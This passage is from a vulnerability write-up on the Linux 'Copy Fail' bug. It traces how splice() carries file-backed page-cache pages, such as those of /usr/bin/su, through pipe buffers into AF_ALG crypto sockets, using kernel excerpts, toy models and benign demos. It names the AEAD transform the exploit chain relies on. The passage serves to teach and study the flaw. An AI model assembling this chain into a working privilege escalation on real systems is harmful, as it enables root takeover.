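

@dataclass
class ToyPipeBuffer:
    page: bytearray   # reference to a backing page, not a copy
    offset: int       # where the data starts inside that page
    len: int          # how many bytes are valid


class ToyPipe:
    def __init__(self, ring_size=16):
        self.head = 0                 # next slot to fill
        self.tail = 0                 # next slot to consume
        self.ring_size = ring_size
        self.bufs = [None] * ring_size

    def push(self, page, offset, length):
        if self.head - self.tail >= self.ring_size:
            raise BlockingIOError("pipe full")
        self.bufs[self.head % self.ring_size] = ToyPipeBuffer(page, offset, length)
        self.head += 1

    def pop(self):
        if self.head == self.tail:
            raise BlockingIOError("pipe empty")
        slot = self.tail % self.ring_size
        buf, self.bufs[slot] = self.bufs[slot], None
        self.tail += 1
        # Only at this point are bytes materialized for the reader
        return bytes(buf.page[buf.offset:buf.offset + buf.len])


existing_page = bytearray(b"....cached file bytes....")
pipe = ToyPipe(ring_size=4)
pipe.push(existing_page, offset=4, length=17)
shares_page = pipe.bufs[0].page is existing_page
data = pipe.pop()
print(shares_page, data)
```

The reader receives a plain byte string, yet the slot that produced it was holding a reference to a page that existed before the pipe ever saw it.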
The ordinary pipe_write() path often copies userspace bytes into pipe-owned pages through copy_page_from_iter(). But the data structure itself is more general:
A pipe_buffer can also describe pages supplied by other kernel paths.
At the userspace level, however, the pipe still looks like a normal byte stream:
axura@pwnlab:~$ python3 - <<'PY'
import os
r, w = os.pipe()
os.write(w, b"hello pipe")
print(os.read(r, 10))
os.close(r)
os.close(w)
PY
b'hello pipe'
The output is just b'hello pipe' — that is the abstraction userspace sees. Copy Fail depends on what this abstraction hides: the pipe internally advances through pipe_buffer descriptors, and those descriptors may later refer to non-anonymous file-backed pages supplied by other kernel subsystems.
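One hint of the ring structure does leak into userspace: pipe capacity is reported in whole pages. The sketch below assumes Linux and queries F_GETPIPE_SZ on a fresh pipe. The fallback constant 1032 is the Linux value of that fcntl command for Python builds that do not export it, and dividing by the page size is only an approximation of the number of descriptor slots.

```python
import fcntl
import mmap
import os

# Linux-specific fcntl command; exported by the fcntl module on Python 3.10+
F_GETPIPE_SZ = getattr(fcntl, "F_GETPIPE_SZ", 1032)

r, w = os.pipe()
try:
    capacity = fcntl.fcntl(w, F_GETPIPE_SZ)
finally:
    os.close(r)
    os.close(w)

slots = capacity // mmap.PAGESIZE
print(f"pipe capacity: {capacity} bytes, about {slots} page-sized slots")
```

On a default configuration this commonly reports 64 KiB, but the value depends on system limits and should not be assumed.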
3.2.2 Page References in Pipe Buffers
Like an object in Python or Java, struct pipe_buffer bundles data with behavior rather than being a flat stream. It does not just say which bytes are visible through the pipe (page, offset, len); through ops and flags, it also tells later kernel code what kind of backing page this is and how that page may be handled.
struct pipe_inode_info
+--------------------------------------+
| head / tail / ring_size |
| |
| bufs[] ring |
| tail head |
| v v |
| +------+------+------+------+---+ |
| | buf0 | buf1 | buf2 | buf3 |...| |
| +------+------+------+------+---+ |
| indices advance modulo ring_size |
+--------------------------------------+
| | |
v v v
struct pipe_buffer descriptors
+-----------------------------+
| page -> backing page |
| offset -> start in page |
| len -> visible bytes |
| ops -> buffer operations |
| flags -> buffer provenance |
+---------------+-------------+
|
+---------------+---------------+
| |
v v
anonymous page file-backed page-cache page
from ordinary write() from splice()That last split is the reason this structure matters for Copy Fail. A pipe slot can describe ordinary pipe-owned memory, but it can also describe a file-backed page that came from another kernel path.
The policy side is expressed through struct pipe_buf_operations:
struct pipe_buf_operations {
int (*confirm)(...); // validate buffer before use
void (*release)(...); // drop references / cleanup
bool (*try_steal)(...); // transfer page ownership if possible
bool (*get)(...); // acquire another page reference
};
To understand how pipe buffers connect to their backing pages, and to set up a comparison with the splice movement in 3.2.3, we can observe how an ordinary write() works.
First, it reaches pipe_write() and installs anon_pipe_buf_ops:
static const struct pipe_buf_operations anon_pipe_buf_ops = {
.release = anon_pipe_buf_release,
.try_steal = anon_pipe_buf_try_steal,
.get = generic_pipe_buf_get,
};
...
buf->ops = &anon_pipe_buf_ops; // dispatch pipe operations
From that point onward, later pipe operations dispatch through buf->ops:
pipe_buffer
└── ops
└── anon_pipe_buf_ops
├── .get -> generic_pipe_buf_get()
├── .release -> anon_pipe_buf_release()
└── .try_steal -> anon_pipe_buf_try_steal()
The callbacks operate on the backing struct page, the first member of struct pipe_buffer.
generic_pipe_buf_get() acquires another reference to the same page:
bool generic_pipe_buf_get(struct pipe_inode_info *pipe,
struct pipe_buffer *buf)
{
return try_get_page(buf->page);
}
generic_pipe_buf_release() later drops that reference:
void generic_pipe_buf_release(struct pipe_inode_info *pipe,
struct pipe_buffer *buf)
{
put_page(buf->page);
}
generic_pipe_buf_try_steal() shows the same page-reference model from the ownership side:
bool generic_pipe_buf_try_steal(struct pipe_inode_info *pipe,
struct pipe_buffer *buf)
{
struct page *page = buf->page;
// Only steal if this is the last remaining page reference
if (page_count(page) == 1) {
// 1 means the pipe holds the only remaining page reference
lock_page(page); // caller now receives the locked page
return true; // ownership transfer succeeded
}
return false; // still referenced elsewhere; cannot steal
}
The takeaway is simple:
pipe_buffer = page reference + byte range + handling policy
For ordinary write(), the referenced page is usually an anonymous pipe-owned page. For splice(), the referenced page may be a file-backed page-cache page. That is the bridge Copy Fail needs: later consumers may think they are reading a pipe byte stream (pipe_buffer), but the pipe slot may point to cached file data.
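To make that formula concrete, here is a minimal userspace sketch, not kernel code. Every toy_* name is a hypothetical stand-in, and the plain integer refcount only approximates what try_get_page(), put_page(), and page_count() do on a real struct page.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Userspace stand-in for struct page; only the reference count is modeled. */
struct toy_page {
    int refcount;
    unsigned char data[64];
};

struct toy_pipe_buf;

/* Handling policy: the callbacks a consumer reaches through buf->ops. */
struct toy_pipe_buf_ops {
    bool (*get)(struct toy_pipe_buf *buf);
    void (*release)(struct toy_pipe_buf *buf);
    bool (*try_steal)(struct toy_pipe_buf *buf);
};

struct toy_pipe_buf {
    struct toy_page *page;               /* page reference */
    unsigned int offset, len;            /* byte range inside that page */
    const struct toy_pipe_buf_ops *ops;  /* handling policy */
};

/* Take one more reference to the same page. */
static bool toy_get(struct toy_pipe_buf *buf)
{
    buf->page->refcount++;
    return true;
}

/* Drop one reference. */
static void toy_release(struct toy_pipe_buf *buf)
{
    assert(buf->page->refcount > 0);
    buf->page->refcount--;
}

/* Stealing is only allowed when the pipe holds the last reference. */
static bool toy_try_steal(struct toy_pipe_buf *buf)
{
    return buf->page->refcount == 1;
}

static const struct toy_pipe_buf_ops toy_anon_ops = {
    .get = toy_get,
    .release = toy_release,
    .try_steal = toy_try_steal,
};
```

With a page whose refcount starts at 1, try_steal succeeds; after one get it fails until the matching release brings the count back to 1.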
3.2.3 Zero-copy Transfer Model
The term zero-copy sounds more magical than it really is, and it is the first ironic half of the name "Copy Fail".
Zero-copy does not mean "no kernel work happens." It means the kernel avoids copying bytes into a fresh intermediate buffer when it can pass around a reference to an existing page.
The previous section established the key abstraction: a pipe_buffer can already name an existing page and attach policy to it. Once a pipe buffer can point at an existing page, a producer does not always need to allocate a new anonymous pipe page and copy bytes into it. It can sometimes install a reference to a page that already exists elsewhere.
ordinary copied path
════════════════════════════════════════
source bytes
│
│ copy_page_from_iter()
▼
anonymous pipe-owned page
│
▼
pipe_buffer -> new page
zero-copy style path
════════════════════════════════════════
existing page
e.g. page-cache page
│
│ install page reference
▼
pipe_buffer -> existing page
The contrast is visible in the ordinary pipe_write() path introduced above. There, the kernel allocates or reuses an anonymous pipe page and then copies userspace bytes into it with copy_page_from_iter():
copied = copy_page_from_iter(page, offset, chars, from);
buf->ops = &anon_pipe_buf_ops;
That is not zero-copy: the bytes are materially copied into an anonymous, pipe-owned page. By contrast, the page-reference model from the previous section allows another path to populate buf->page with an already existing page and then let later consumers operate on that same page through buf->ops.
The contrast looks like this:
ordinary write() splice()-style path
════════════════════════════════════════════════════════
userspace buffer file-backed page cache
+-------------------+ +--------------------+
| e.g. "hello pipe" | | existing file page |
+----------+--------+ +----------+---------+
| |
| copy_page_from_iter() | reference page
v v
┌─────────────────────┐ ┌─────────────────────┐
│ anonymous pipe page │ │ file-backed page │
└───────────┬─────────┘ └─────────┬───────────┘
| |
| copied | zero-copy
v v
+-----------------------------------------+
| struct pipe_buffer |
|-----------------------------------------|
| buf->page |
+-----------------------------------------+
So in practice, zero-copy means page-backed state plus reference management via the pointer struct page *page. The bytes stay where they already are; what moves between kernel subsystems is the metadata that grants access to that page.
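The practical consequence of the two paths can be modeled in userspace. This is a sketch under simplifying assumptions: toy_page, toy_buf, and the three helpers are invented for illustration and are not kernel APIs.

```c
#include <assert.h>
#include <string.h>

#define TOY_PAGE_SIZE 64

struct toy_page {
    unsigned char data[TOY_PAGE_SIZE];
};

struct toy_buf {
    struct toy_page *page;
    unsigned int offset, len;
};

/* Copied path: the bytes are duplicated into a page owned by the buffer. */
static void toy_fill_by_copy(struct toy_buf *buf, struct toy_page *own,
                             const void *src, unsigned int len)
{
    assert(len <= TOY_PAGE_SIZE);
    memcpy(own->data, src, len);
    buf->page = own;
    buf->offset = 0;
    buf->len = len;
}

/* Zero-copy path: only the page reference and byte range are recorded. */
static void toy_fill_by_ref(struct toy_buf *buf, struct toy_page *existing,
                            unsigned int offset, unsigned int len)
{
    assert(offset + len <= TOY_PAGE_SIZE);
    buf->page = existing;
    buf->offset = offset;
    buf->len = len;
}

/* A consumer writing through the buffer touches whatever page it names. */
static void toy_write_through(struct toy_buf *buf, unsigned int pos,
                              unsigned char value)
{
    assert(pos < buf->len);
    buf->page->data[buf->offset + pos] = value;
}
```

A write through the copied buffer leaves the source page untouched, while the same write through the referenced buffer lands in the original page. That aliasing is the property the rest of the chain relies on.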
So the next question is: what performs the trick? Instead of copying file bytes into an anonymous pipe page, splice() makes the pipe buffer reference the file's existing page-cache page directly.
3.2.4 Splice-backed Page Movement
With the pipe-buffer model in place, splice() stops looking like a quirky read/write shortcut. For Copy Fail, it is the zero-copy mechanism that moves page references across kernel subsystems.
There are two stages to keep separate:
- file → pipe: a file-backed page-cache page is installed into a pipe buffer.
- pipe → next consumer: that same pipe buffer can be forwarded into another kernel subsystem, such as a socket send path.
So the exploit-relevant shape is:
file-backed page cache
│
│ splice(file -> pipe)
▼
pipe_buffer references file page
│
│ splice(pipe -> consumer)
▼
next kernel consumer receives page-backed data
3.2.4.1 File -> Pipe
At the syscall layer, splice() first resolves the userspace file descriptors into kernel struct file objects, then dispatches into the internal splice engine:
SYSCALL_DEFINE6(splice,
int, fd_in, loff_t __user *, off_in, // was userspace fd
int, fd_out, loff_t __user *, off_out,
size_t, len, unsigned int, flags)
/* splice(int fd_in, ..., int fd_out, ...) */
{
struct fd in, out;
ssize_t error;
...
in = fdget(fd_in);
if (in.file) {
out = fdget(fd_out);
if (out.file) {
/*
* transition 1
* fd_in / fd_out are now kernel struct file objects
*/
error = __do_splice(in.file, off_in, out.file, off_out,
len, flags);
fdput(out);
}
fdput(in);
}
return error;
}
So the syscall boundary converts:
- userspace fd_in → source struct file
- userspace fd_out → destination struct file
Those objects enter __do_splice(), where the kernel checks whether either endpoint is a pipe:
static ssize_t __do_splice(struct file *in, loff_t __user *off_in,
struct file *out, loff_t __user *off_out,
size_t len, unsigned int flags)
{
struct pipe_inode_info *ipipe;
struct pipe_inode_info *opipe;
loff_t offset, *__off_in = NULL, *__off_out = NULL;
ssize_t ret;
// Detect whether the input or output endpoint is a pipe
ipipe = get_pipe_info(in, true);
opipe = get_pipe_info(out, true);
...
// transition 2
return do_splice(in, __off_in, out, __off_out, len, flags);
}
The direction is selected in do_splice():
ssize_t do_splice(struct file *in, loff_t *off_in,
struct file *out, loff_t *off_out,
size_t len, unsigned int flags)
{
...
ipipe = get_pipe_info(in, true);
opipe = get_pipe_info(out, true);
// if both are pipes
if (ipipe && opipe) {
ret = splice_pipe_to_pipe(ipipe, opipe, len, flags);
// if only input is pipe
} else if (ipipe) {
ret = do_splice_from(ipipe, out, &offset, len, flags);
// if only output is pipe
} else if (opipe) {
/*
* transition 3
*
* Copy Fail first-stage direction:
*
* regular file -> pipe
*/
ret = splice_file_to_pipe(in, opipe, &offset, len, flags);
} else {
ret = -EINVAL;
}
...
return ret;
}
For the first Copy Fail stage:
- in.file = regular file (e.g. /usr/bin/su)
- out.file = pipe
so the opipe branch dispatches into splice_file_to_pipe():
ssize_t splice_file_to_pipe(struct file *in,
struct pipe_inode_info *opipe,
loff_t *offset,
size_t len, unsigned int flags)
{
ssize_t ret;
pipe_lock(opipe);
ret = wait_for_space(opipe, flags);
if (!ret)
// transition 4
ret = do_splice_read(in, offset, opipe, len, flags);
pipe_unlock(opipe);
...
}
At the transition point, do_splice_read() decides whether the operation can use the file's page cache or must fall back to a copied path:
static ssize_t do_splice_read(struct file *in, loff_t *ppos,
struct pipe_inode_info *pipe, size_t len,
unsigned int flags)
{
...
/*
* O_DIRECT and DAX don't deal with the pagecache, so we allocate a
* buffer, copy into it and splice that into the pipe.
*/
if ((in->f_flags & O_DIRECT) || IS_DAX(in->f_mapping->host))
// O_DIRECT and DAX bypass normal page cache
// so kernel cannot perform normal page-cache-based splice operations
// but perform an explicit buffered copy instead
return copy_splice_read(in, ppos, pipe, len, flags);
/*
* transition 5
* normal buffered files use the file's splice_read handler
*/
return in->f_op->splice_read(in, ppos, pipe, len, flags);
}
The important branch is at transition 5:
return in->f_op->splice_read(...);
For normal buffered files, execution continues through the file's splice_read operation:
struct file_operations {
...
ssize_t (*splice_write)(struct pipe_inode_info *, struct file *, loff_t *, size_t, unsigned int);
ssize_t (*splice_read)(struct file *, loff_t *, struct pipe_inode_info *, size_t, unsigned int);
...
} __randomize_layout;
For page-cache-backed files, this last read step is the critical one. The execution flow so far is:
splice(fd_file, ..., fd_pipe, ...)
|
v
do_splice()
|
v
splice_file_to_pipe()
|
v
do_splice_read()
|
v
in->f_op->splice_read(...)
The generic read-only file operations table wires filemap_splice_read() as the splice_read handler:
const struct file_operations generic_ro_fops = {
.read_iter = generic_file_read_iter,
.mmap = generic_file_readonly_mmap,
.splice_read = filemap_splice_read, // [!]
};
The comment above filemap_splice_read() states the behavior directly:
/*
* filemap_splice_read - Splice data from a file's pagecache into a pipe
*
* This function gets folios from a file's pagecache and splices them into the
* pipe.
*/
Internally, it first retrieves cached folios from the file mapping, then inserts those folios into pipe buffers:
ssize_t filemap_splice_read(struct file *in, loff_t *ppos,
struct pipe_inode_info *pipe,
size_t len, unsigned int flags)
{
struct folio_batch fbatch;
...
do {
// retrieve page-cache folios from the file mapping
error = filemap_get_pages(&iocb, len, &fbatch, true);
...
for (i = 0; i < folio_batch_count(&fbatch); i++) {
struct folio *folio = fbatch.folios[i];
size_t n;
...
/*
* transition 6
* insert the selected cached folio into the pipe
*/
n = splice_folio_into_pipe(pipe, folio, *ppos, n);
...
}
folio_batch_release(&fbatch);
} while (len);
...
return total_spliced ? total_spliced : error;
}
The exact insertion happens in splice_folio_into_pipe():
/*
* Splice subpages from a folio into a pipe.
*/
size_t splice_folio_into_pipe(struct pipe_inode_info *pipe,
struct folio *folio, loff_t fpos, size_t size)
{
struct page *page;
size_t spliced = 0, offset = offset_in_folio(folio, fpos);
...
while (spliced < size &&
!pipe_full(pipe->head, pipe->tail, pipe->max_usage)) {
// retrieve the next pipe_buffer slot inside the pipe ring buffer
struct pipe_buffer *buf = pipe_head_buf(pipe);
size_t part = min_t(size_t, PAGE_SIZE - offset, size - spliced);
// [!] insertion: attach file-backed page -> retrieved pipe buffer
*buf = (struct pipe_buffer) {
.ops = &page_cache_pipe_buf_ops, // [!] page cache marker
.page = page,
.offset = offset,
.len = part,
};
...
}
return spliced;
}
The ops field is also important. The buffer is marked with page_cache_pipe_buf_ops, not the anonymous pipe-buffer operations that ordinary write() installs (see 3.2.2):
// install operations for page-cache buffer
const struct pipe_buf_operations page_cache_pipe_buf_ops = {
.confirm = page_cache_pipe_buf_confirm,
.release = page_cache_pipe_buf_release,
.try_steal = page_cache_pipe_buf_try_steal,
.get = generic_pipe_buf_get,
};
At this stage, the pipe buffer directly references a file-backed page-cache page:
file on disk (e.g. /usr/bin/su)
│
▼
page cache folio/page
│
│ filemap_splice_read()
▼
pipe_buffer {
.ops = page_cache_pipe_buf_ops
.page = file-backed page-cache page [!]
}
This is the first bridge Copy Fail needs. After splice(file -> pipe), the pipe is not carrying copied file bytes in anonymous pipe memory. It is carrying a pipe_buffer that still references the original cached file page.
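From userspace, this first stage is a single splice() call. The sketch below uses a hypothetical helper, splice_file_head(), that moves the first bytes of a file into a pipe and then reads them back out with an ordinary read(). It assumes a Linux system and a filesystem whose files support splice. It demonstrates only the file → pipe step; whether the kernel passed a page reference or fell back to a copied path is not observable from this code.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <fcntl.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Splice up to len bytes from the start of path into a fresh pipe, then
 * read them back out of the pipe into out.
 * Returns the number of bytes read back, 0 at end of file, or -1 on error.
 */
static ssize_t splice_file_head(const char *path, void *out, size_t len)
{
    int pfd[2];
    ssize_t moved, got;
    loff_t off = 0;
    int fd;

    assert(path != NULL && out != NULL);

    fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;
    if (pipe(pfd) < 0) {
        close(fd);
        return -1;
    }

    /* file -> pipe: no userspace buffer is involved in this step */
    moved = splice(fd, &off, pfd[1], NULL, len, 0);
    if (moved > 0)
        /* pipe -> userspace: an ordinary copying read */
        got = read(pfd[0], out, (size_t)moved);
    else
        got = moved;

    close(pfd[0]);
    close(pfd[1]);
    close(fd);
    return got;
}
```

The request is capped by the pipe capacity, so a large len may move fewer bytes than asked; the helper simply returns whatever was transferred.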
3.2.4.2 Pipe -> Socket
The second stage is that the pipe layer can forward the same pipe_buffer into another kernel subsystem. For Copy Fail, the relevant destination is a socket send path.
The generic helper __splice_from_pipe() describes the model directly: it walks pipe buffers and lets an actor move each buffer to the destination.
/**
* __splice_from_pipe - splice data from a pipe to given actor
*
* Description:
* This function does little more than loop over the pipe and call
* @actor to do the actual moving of a single struct pipe_buffer to
* the desired destination. See pipe_to_file, pipe_to_sendmsg, or
* pipe_to_user.
*/
For socket destinations, the concrete path is splice_to_socket():
/**
* splice_to_socket - splice data from a pipe to a socket
*
* Description:
* Will send @len bytes from the pipe to a network socket. No data copying
* is involved.
*/
The comment gives the high-level idea, but the important detail is visible in the implementation: the socket payload is built from the page already carried by the pipe buffer.
struct bio_vec bvec[16];
struct msghdr msg = {};
...
struct pipe_buffer *buf = pipe_buf(pipe, tail);
...
bvec_set_page(
&bvec[bc++],
buf->page, // page referenced by pipe_buffer
seg, // byte length
buf->offset // offset inside that page
);
Here, struct bio_vec is a small descriptor for a page-backed byte range:
struct bio_vec {
struct page *bv_page;
unsigned int bv_len;
unsigned int bv_offset;
};
So this conversion is straightforward:
pipe_buffer
page = cached file page
offset = offset inside that page
len = visible byte range
│
▼
bio_vec
bv_page = same cached file page
bv_offset = same offset
bv_len = selected segment length
Then splice_to_socket() wraps those bio_vec entries into the socket message iterator:
// make msg_iter walk over bio_vec-backed pages
iov_iter_bvec(
&msg.msg_iter, // describes the payload being sent
ITER_SOURCE,
bvec,
bc,
len
);
msg.msg_flags = MSG_SPLICE_PAGES; // [!] mark this send as splice-backed page data
ret = sock_sendmsg(sock, &msg);
The flag MSG_SPLICE_PAGES tells the socket send path that this payload came from spliced pages rather than from an ordinary copied userspace buffer.
That gives the handoff shape:
pipe_buffer
|
| buf->page / buf->offset / buf->len
v
bio_vec
|
| iov_iter_bvec()
v
msghdr.msg_iter
|
| MSG_SPLICE_PAGES
v
sock_sendmsg()
The key point is that the socket consumer is not receiving a freshly copied anonymous buffer. It receives a socket message whose iterator still describes page-backed data derived from the original pipe buffer.
For Copy Fail, the chain now looks like this:
file-backed cached page
|
v
pipe_buffer
|
v
bio_vec
|
v
msg.msg_iter + MSG_SPLICE_PAGES
|
v
socket-side consumer
At this point, the generic primitive is established: a file-backed cached page can move from a pipe into a socket send path while still being represented as page-backed data.
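The pipe_buffer → bio_vec step can be reduced to a few lines of userspace C. This is a model, not the kernel implementation: the toy_* types and toy_pipe_to_bvec() are hypothetical, and the only property it tries to show is that the page pointer is carried over unchanged while just the length is trimmed.

```c
#include <assert.h>
#include <stddef.h>

struct toy_page {
    unsigned char data[4096];
};

struct toy_pipe_buf {
    struct toy_page *page;
    unsigned int offset, len;
};

struct toy_bvec {
    struct toy_page *bv_page;
    unsigned int bv_len;
    unsigned int bv_offset;
};

/*
 * Describe pipe buffers as bvec entries, limited to want bytes and max
 * entries. Returns the number of entries filled; *total receives the
 * number of bytes those entries describe.
 */
static size_t toy_pipe_to_bvec(const struct toy_pipe_buf *bufs, size_t nbufs,
                               struct toy_bvec *bvec, size_t max,
                               size_t want, size_t *total)
{
    size_t bc = 0;

    assert(total != NULL);
    *total = 0;
    for (size_t i = 0; i < nbufs && bc < max && want > 0; i++) {
        size_t seg = bufs[i].len < want ? bufs[i].len : want;

        if (seg == 0)
            continue;
        bvec[bc].bv_page = bufs[i].page;      /* same page, no copy */
        bvec[bc].bv_offset = bufs[i].offset;  /* same offset */
        bvec[bc].bv_len = (unsigned int)seg;  /* possibly trimmed length */
        bc++;
        *total += seg;
        want -= seg;
    }
    return bc;
}
```

Nothing in the conversion records where the page originally came from; the descriptor only says which page, which offset, and how many bytes.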
3.3 AF_ALG Crypto Request Pipeline
The previous section stopped at a pipe buffer being forwarded into a socket send path. For Copy Fail, the socket consumer that matters is AF_ALG: the Linux kernel crypto socket interface.
This is where the data changes identity:
file-backed page
|
v
pipe buffer
|
v
socket message
|
v
AF_ALG crypto request buffer
Once the page-backed data enters AF_ALG, it can be represented as part of a crypto request scatterlist rather than as ordinary executable file data.
If you are not familiar with the kernel socket implementation, I would suggest this learning resource:
LinuxNetworkProgramming: A comprehensive guide for Linux Network (Socket) programming
3.3.1 AF_ALG Socket Interface
AF_ALG, socket family 38, exposes part of the kernel crypto API through the socket interface.
From userspace, it does not look like a privileged ioctl or a special device node. It follows a normal socket-style workflow:
socket()
|
v
bind algorithm type/name
|
v
setsockopt configuration
|
v
accept operation socket
|
v
sendmsg input
|
v
recvmsg output
3.3.1.1 Userspace Call Pattern
A minimal AF_ALG hash example looks like this:
#include <stdio.h>
#include <sys/socket.h>
#include <linux/if_alg.h>
#include <unistd.h>
#include <string.h>
int main(void)
{
/* create AF_ALG control socket */
int tfmfd = socket(AF_ALG, SOCK_SEQPACKET, 0);
// [!] selected algorithm
struct sockaddr_alg sa = {
.salg_family = AF_ALG,
.salg_type = "hash",
.salg_name = "sha256",
};
/* bind algorithm type/name */
bind(
tfmfd, // AF_ALG socket fd
(struct sockaddr *)&sa, // sockaddr_alg
sizeof(sa)
);
/* create operation socket */
int opfd = accept(tfmfd, NULL, 0);
/* submit input buffer */
send(opfd, "AAAA", 4, 0);
/* receive resulting digest */
unsigned char digest[32];
recv(opfd, digest, sizeof(digest), 0);
/* print digest */
printf("sha256(\"AAAA\") = ");
for (int i = 0; i < 32; i++)
printf("%02x", digest[i]);
printf("\n");
close(opfd);
close(tfmfd);
return 0;
}
The sample computes the SHA-256 digest of the input string "AAAA":
axura@pwnlab:/tmp$ gcc -o test_alg test_alg.c
axura@pwnlab:/tmp$ ./test_alg
sha256("AAAA") = 63c1dd951ffedf6f7fd968ad4efa39b8ed584f162f46e715114ee184f8de9201
3.3.1.2 Algorithm Selection
The algorithm selection itself is carried through the AF_ALG-specific socket address structure, struct sockaddr_alg:
struct sockaddr_alg {
__u16 salg_family;
__u8 salg_type[14];
__u32 salg_feat;
__u32 salg_mask;
__u8 salg_name[64]; /* the newer struct sockaddr_alg_new declares salg_name[] with no fixed limit */
};
It plays the same structural role as:
- sockaddr_in for IPv4
- sockaddr_in6 for IPv6
- sockaddr_un for Unix sockets
But instead of carrying an IP address or filesystem path, it carries crypto selection data. The two important user-controlled strings are:
- salg_type: which AF_ALG interface family should handle this socket
- salg_name: which concrete crypto algorithm inside that family should be instantiated
In the Copy Fail path, userspace supplies this pair:
.salg_type = "aead",
.salg_name = "authencesn(hmac(sha256),cbc(aes))",
The first string decides which AF_ALG family handles the socket. The second decides which kernel crypto algorithm is instantiated inside that family.
userspace
│
│ socket(AF_ALG, SOCK_SEQPACKET, 0)
│
│ bind(
│ type = "aead",
│ name = "authencesn(hmac(sha256),cbc(aes))"
│ )
▼
kernel AF_ALG layer
│
│ resolve family + algorithm
▼
AEAD operation socket
│
│ sendmsg() / recvmsg()
▼
selected AEAD implementation
The authencesn decrypt path becomes important later in 3.4. For now, the key point is that an ordinary userspace bind() routes the socket into the AEAD family and selects the exact transform used by the exploit.
3.3.1.3 AF_ALG Family Resolution
At that point, userspace has already prepared an AF_ALG control socket, and calls bind() with an initialized struct sockaddr_alg:
struct sockaddr_alg sa = {
.salg_family = AF_ALG,
.salg_type = "aead",
.salg_name = "authencesn(hmac(sha256),cbc(aes))",
};
bind(tfmfd, (struct sockaddr *)&sa, sizeof(sa));
The generic socket layer eventually reaches __sys_bind(), which dispatches through the socket operations table:
err = READ_ONCE(sock->ops)->bind(
sock,
(struct sockaddr *)&address,
addrlen
);
For an AF_ALG transform socket, that handler is alg_bind(). This is where the generic AF_ALG layer receives the algorithm type and name from the sockaddr_alg object prepared in the previous step:
type = alg_get_type(sa->salg_type); // resolve AF_ALG interface family
...
private = type->bind(
sa->salg_name,
sa->salg_feat,
sa->salg_mask
);
For Copy Fail:
sa->salg_type = "aead"
so the kernel resolves the registered AF_ALG family named "aead".
The resolved object is a struct af_alg_type, the family dispatch table:
struct af_alg_type {
/* instantiate concrete algorithm by name */
void *(*bind)(const char *name, u32 type, u32 mask);
/* release family-private algorithm state */
void (*release)(void *private);
/* configure key material */
int (*setkey)(void *private, const u8 *key, unsigned int keylen);
/* configure AEAD authentication tag size */
int (*setauthsize)(void *private, unsigned int authsize);
/* create accepted operation socket */
int (*accept)(void *private, struct sock *sk);
int (*accept_nokey)(void *private, struct sock *sk);
/* socket operations exposed by accepted operation socket */
struct proto_ops *ops;
struct proto_ops *ops_nokey;
struct module *owner;
/* AF_ALG family name, e.g. "aead" */
char name[14];
};
For the AEAD family used in Copy Fail, this resolves to algif_type_aead:
static const struct af_alg_type algif_type_aead = {
.bind = aead_bind,
.release = aead_release,
.setkey = aead_setkey,
.setauthsize = aead_setauthsize,
.accept = aead_accept_parent,
.accept_nokey = aead_accept_parent_nokey,
.ops = &algif_aead_ops,
.ops_nokey = &algif_aead_ops_nokey,
.name = "aead",
.owner = THIS_MODULE
};
Now the earlier generic bind call becomes concrete:
type->bind(...)
|
v
aead_bind("authencesn(hmac(sha256),cbc(aes))", ...)
So the resolution chain is:
bind(tfmfd, sockaddr_alg)
|
v
alg_bind()
|
| salg_type = "aead"
v
alg_get_type("aead")
|
v
algif_type_aead
|
| salg_name = "authencesn(hmac(sha256),cbc(aes))"
v
aead_bind(...)
The same family object, algif_type_aead, also controls the later operations:
setsockopt(..., ALG_SET_KEY, ...)
|
v
aead_setkey()
setsockopt(..., ALG_SET_AEAD_AUTHSIZE, ...)
|
v
aead_setauthsize()
accept(tfmfd, ...)
|
v
aead_accept_parent()
sendmsg(opfd, ...) / recvmsg(opfd, ...)
|
v
algif_aead_ops
That last field matters because the accepted operation socket exposes the AEAD-specific socket operations table, algif_aead_ops (a struct proto_ops):
static struct proto_ops algif_aead_ops = {
...
.sendmsg = aead_sendmsg,
.recvmsg = aead_recvmsg,
...
};
So the full bridge is:
userspace bind()
|
v
generic AF_ALG bind handler
|
v
resolve family by salg_type
|
v
instantiate algorithm by salg_name
|
v
install family-specific behavior for later
setsockopt(), accept(), sendmsg(), recvmsg()
For Copy Fail, this means a normal userspace socket setup is enough to route later sendmsg() and recvmsg() calls into the AEAD request path selected by authencesn(hmac(sha256),cbc(aes)).
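The two-level lookup (family by salg_type, then algorithm by salg_name) is ordinary table dispatch. Here is a small userspace model of that shape. The toy_* names, the two-entry registry, and the returned strings are all assumptions made for illustration; the real alg_get_type() walks a registered list and handles module loading, which this sketch ignores.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Model of a family dispatch entry: a name plus a bind callback. */
struct toy_alg_type {
    const char *name;                      /* family name, e.g. "aead" */
    const char *(*bind)(const char *alg);  /* instantiate algorithm by name */
};

static const char *toy_hash_bind(const char *alg)
{
    (void)alg;  /* a real bind would look the algorithm up by name */
    return "hash transform";
}

static const char *toy_aead_bind(const char *alg)
{
    (void)alg;
    return "aead transform";
}

static const struct toy_alg_type toy_types[] = {
    { "hash", toy_hash_bind },
    { "aead", toy_aead_bind },
};

/* Step 1: resolve the family from salg_type. */
static const struct toy_alg_type *toy_get_type(const char *name)
{
    assert(name != NULL);
    for (size_t i = 0; i < sizeof(toy_types) / sizeof(toy_types[0]); i++)
        if (strcmp(toy_types[i].name, name) == 0)
            return &toy_types[i];
    return NULL;
}

/* Step 2: let the resolved family instantiate the algorithm from salg_name. */
static const char *toy_bind(const char *salg_type, const char *salg_name)
{
    const struct toy_alg_type *type = toy_get_type(salg_type);

    return type ? type->bind(salg_name) : NULL;
}
```

The generic layer never needs to know what "aead" means; it only finds the entry and calls through it, which is why every later operation inherits the family-specific behavior.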
3.3.1.4 Control Socket and Operation Socket Split
AF_ALG separates transform configuration from request I/O.
The socket returned by socket(AF_ALG, ...) is the control socket:
// request AF_ALG socket returning control socket tfmfd
tfmfd = socket(AF_ALG, SOCK_SEQPACKET, 0)
bind(tfmfd, ...)
setsockopt(tfmfd, ...)
The bind(tfmfd, ...) and setsockopt(tfmfd, ...) calls select and configure the crypto transform.
Actual request traffic happens on a second socket created by accept():
int opfd = accept(tfmfd, NULL, 0); // accept() returns operation socket
Inside the kernel, af_alg_accept() creates this operation socket and installs the operation table from the resolved struct af_alg_type described in the previous section:
const struct af_alg_type *type;
/*
